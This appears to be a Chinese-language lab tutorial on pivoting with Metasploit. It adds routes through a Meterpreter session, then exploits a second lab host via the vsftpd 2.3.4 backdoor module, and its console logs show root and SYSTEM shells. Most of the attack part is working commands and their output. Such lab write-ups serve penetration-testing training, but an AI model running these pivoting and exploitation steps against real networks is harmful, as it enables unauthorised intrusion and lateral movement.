前言
本文简单介绍了使用metasploit搭建跳板进行攻击
一、添加路由项
添加路由项功能:
关于路由表,本人对metasploit使用添加路由项并没有深刻理解,仅供参考;
方法一:
使用run autoroute -p/-s
①功能介绍
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage: run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
[*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
[*] run autoroute -p # Print active routing table
[*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
②具体过程
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.112
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.112/255.255.255.0...
[+] Added route to 192.168.1.112/255.255.255.0 via 192.168.1.106
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.112 255.255.255.0 Session 1
meterpreter >
方法二:
使用run get_local_subnets
①介绍功能
Route traffic destined to a given subnet through a supplied session.
Usage:
route [add/remove] subnet netmask [comm/sid]
route [add/remove] cidr [comm/sid]
route [get] <host or network>
route [flush]
route [print]
Subcommands:
add - make a new route
remove - delete a route; 'del' is an alias
flush - remove all routes
get - display the route for a given target
print - show all active routes
Examples:
Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1
route add 192.168.0.0 255.255.255.0 1
route add 192.168.0.0/24 1
Delete the above route
route remove 192.168.0.0/24 1
route del 192.168.0.0 255.255.255.0 1
Display the route that would be used for the given host or network
route get 192.168.0.11
②具体过程
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 1
[*] Route added
msf6 exploit(windows/smb/ms08_067_netapi) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 1
192.168.1.112 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined.
二、进行攻击
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.112:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.112:21 - USER: 331 Please specify the password.
[+] 192.168.1.112:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.112:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 8 opened (192.168.1.106:1947 -> 192.168.1.112:6200) at 2021-06-05 11:01:10 +0800
arp
Address HWtype HWaddress Flags Mask Iface
192.168.1.113 ether 00:0C:29:23:E3:CD C eth0
192.168.1.106 ether 00:0C:29:95:E3:EA C eth0
192.168.1.1 ether 94:D9:B3:12:6F:C0 C eth0
background
Background session 8? [y/N] y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============
看以下信息↓↓↓
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WINXP-1 192.168.1.113:4444 -> 192.168.1.106:1279 (192.168.1.106)
8 shell cmd/unix 192.168.1.106:1947 -> 192.168.1.112:6200 (192.168.1.112)
上图最后显示的,攻击靶机2后,是以靶机1(192.168.1.106)指向靶机2(192.168.1.112)
总结
本文简单介绍了使用metasploit进行搭建跳板对目标渗透测试,仅供学习